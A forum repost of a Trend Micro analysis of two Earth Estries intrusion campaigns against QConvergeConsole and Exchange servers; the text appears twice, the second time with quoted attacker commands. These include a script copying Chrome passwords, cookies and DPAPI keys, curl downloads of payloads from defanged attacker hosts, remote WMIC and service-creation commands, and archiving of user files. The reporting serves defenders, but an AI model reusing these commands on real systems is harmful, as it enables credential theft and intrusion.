Man
Professional
- Messages
- 3,070
- Reaction score
- 606
- Points
- 113
Behind the scenes of sophisticated cyberattacks on corporate networks.
Trend Micro detailed two large-scale hacking campaigns launched by the Earth Estries group. Attackers have used advanced techniques to penetrate corporate systems through vulnerabilities in widespread software.
The first attack scheme focused on the exploitation of QConvergeConsole, a tool for managing QLogic fiber optic adapters. After gaining initial access, the hackers used the PsExec and WMIC utilities to spread the malware across the network.
Researchers note that the attackers exploited vulnerabilities or incorrect settings of the QConvergeConsole through an installed remote application agent (c:\program files\qlogic corporation\nqagent\netqlremote.exe), which allowed network scanning and installation of Cobalt Strike on targeted machines.
In another case, the group used a vulnerability in Apache Tomcat6 shipped with the QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe) to laterally move and control late-stage attack tools.
The group also actively used various backdoors to gain a foothold in the system. Among them are Cobalt Strike, Trillclient, Hemigate and a new sample called Crowdoor. The malware was delivered to infected machines in the form of CAB archives.
Particular attention is drawn to the Trillclient tool, which stole credentials from the browser cache. With its help, attackers gained additional control over compromised systems. Earth Estries demonstrated a deep understanding of the victims' infrastructure – they directly downloaded documents from internal web repositories using the wget command.
Trillclient ran a PowerShell script to collect user profiles:
In the second attack scheme, hackers exploited vulnerabilities in Microsoft Exchange. The servers were equipped with the ChinaCopper web shell, through which the attackers deployed Cobalt Strike and other tools for lateral movement across the network.
The key components of this chain were the Zingdoor and SnappyBee (also known as the Deed RAT) backdoors. The malware was downloaded either from command and control servers or through curl requests to sites controlled by the hackers. Typical commands for loading tools looked like this:
Unlike the first scheme, the focus here was on exploiting Exchange and frequently updating malware to avoid detection. The group actively used PortScan to map networks, and additional backdoors helped in collecting and exporting documents through RAR archives.
Earth Estries focused on a covert presence in victims' networks. They regularly updated their tools and covered their tracks by removing older versions of the malware. A long-lasting presence was ensured by various custom backdoors, including the recently discovered Crowdoor, which interacted with Cobalt Strike.
To gain a foothold in the system, the attackers used various methods to create scheduled tasks, including remote creation via WMIC:
Researchers have identified several techniques used by the group. In addition to stealing credentials through Trillclient, the hackers masked team traffic through local and remote proxy servers.
PortScan and special scripts were used to scout the network infrastructure. After downloading the PortScan utility, the attackers scanned the network for open ports 80, 443, 445, and 3389:
The collected data was packaged in encrypted RAR archives and uploaded through anonymous file sharing sites. Examples of commands for data collection:
During the investigation, additional backdoors were discovered - FuxosDoor and Cryptmerlin. FuxosDoor worked as a backdoor for the IIS web server, providing covert communication with C&C servers. Cryptmerlin used the DLL sideloading technique to control the infected machines for a long time.
Zingdoor and SnappyBee functioned as HTTP backdoors, facilitating lateral movement across the network. SnappyBee is a modular backdoor that is believed to be the successor to ShadowPad. Both malware used the DLL sideloading mechanism to inject itself into legitimate processes.
Through the ChinaChopper web shell, the attackers created remote services to escalate privileges and ensure persistence:
The new Crowdoor backdoor, seen in the first attack chain, expanded the group's ability to reinstall and update Cobalt Strike on compromised systems. It performed various actions depending on the arguments passed, including setting persistence mechanisms through the registry or services.
The ChinaCopper web shell used in the second scheme provided remote control over infected Exchange servers and served as a springboard for further network penetration.
Experts strongly recommend that organizations fix vulnerabilities in services accessible from the outside, especially in widely used applications such as mail servers and management consoles.
Source
Trend Micro detailed two large-scale hacking campaigns launched by the Earth Estries group. Attackers have used advanced techniques to penetrate corporate systems through vulnerabilities in widespread software.
The first attack scheme focused on the exploitation of QConvergeConsole, a tool for managing QLogic fiber optic adapters. After gaining initial access, the hackers used the PsExec and WMIC utilities to spread the malware across the network.
Researchers note that the attackers exploited vulnerabilities or incorrect settings of the QConvergeConsole through an installed remote application agent (c:\program files\qlogic corporation\nqagent\netqlremote.exe), which allowed network scanning and installation of Cobalt Strike on targeted machines.
In another case, the group used a vulnerability in Apache Tomcat6 shipped with the QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe) to laterally move and control late-stage attack tools.
The group also actively used various backdoors to gain a foothold in the system. Among them are Cobalt Strike, Trillclient, Hemigate and a new sample called Crowdoor. The malware was delivered to infected machines in the form of CAB archives.
Particular attention is drawn to the Trillclient tool, which stole credentials from the browser cache. With its help, attackers gained additional control over compromised systems. Earth Estries demonstrated a deep understanding of the victims' infrastructure – they directly downloaded documents from internal web repositories using the wget command.
Trillclient ran a PowerShell script to collect user profiles:
Code:
foreach($win_user_path in $users_path){
echo D | xcopy \"C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\" \"$copy_dest_path\$win_user_path\Protect\" /E /C /H;
attrib -a -s -r -h \"$copy_dest_path\$win_user_path\*\" /S /D;
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\" \"$copy_dest_path\$win_user_path\Local State\" /C;
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"$copy_dest_path\$win_user_path\Default\Network\Cookies\" /C
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"$copy_dest_path\$win_user_path\Default\Login Data\" /C;
}In the second attack scheme, hackers exploited vulnerabilities in Microsoft Exchange. The servers were equipped with the ChinaCopper web shell, through which the attackers deployed Cobalt Strike and other tools for lateral movement across the network.
The key components of this chain were the Zingdoor and SnappyBee (also known as the Deed RAT) backdoors. The malware was downloaded either from command and control servers or through curl requests to sites controlled by the hackers. Typical commands for loading tools looked like this:
Code:
curl -o c:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt
curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx
curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docxUnlike the first scheme, the focus here was on exploiting Exchange and frequently updating malware to avoid detection. The group actively used PortScan to map networks, and additional backdoors helped in collecting and exporting documents through RAR archives.
Earth Estries focused on a covert presence in victims' networks. They regularly updated their tools and covered their tracks by removing older versions of the malware. A long-lasting presence was ensured by various custom backdoors, including the recently discovered Crowdoor, which interacted with Cobalt Strike.
To gain a foothold in the system, the attackers used various methods to create scheduled tasks, including remote creation via WMIC:
Code:
wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"Researchers have identified several techniques used by the group. In addition to stealing credentials through Trillclient, the hackers masked team traffic through local and remote proxy servers.
PortScan and special scripts were used to scout the network infrastructure. After downloading the PortScan utility, the attackers scanned the network for open ports 80, 443, 445, and 3389:
Code:
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443"
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"The collected data was packaged in encrypted RAR archives and uploaded through anonymous file sharing sites. Examples of commands for data collection:
Code:
rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History"
rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date>During the investigation, additional backdoors were discovered - FuxosDoor and Cryptmerlin. FuxosDoor worked as a backdoor for the IIS web server, providing covert communication with C&C servers. Cryptmerlin used the DLL sideloading technique to control the infected machines for a long time.
Zingdoor and SnappyBee functioned as HTTP backdoors, facilitating lateral movement across the network. SnappyBee is a modular backdoor that is believed to be the successor to ShadowPad. Both malware used the DLL sideloading mechanism to inject itself into legitimate processes.
Through the ChinaChopper web shell, the attackers created remote services to escalate privileges and ensure persistence:
Code:
sc \\{hostname} create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"The new Crowdoor backdoor, seen in the first attack chain, expanded the group's ability to reinstall and update Cobalt Strike on compromised systems. It performed various actions depending on the arguments passed, including setting persistence mechanisms through the registry or services.
The ChinaCopper web shell used in the second scheme provided remote control over infected Exchange servers and served as a springboard for further network penetration.
Experts strongly recommend that organizations fix vulnerabilities in services accessible from the outside, especially in widely used applications such as mail servers and management consoles.
Source
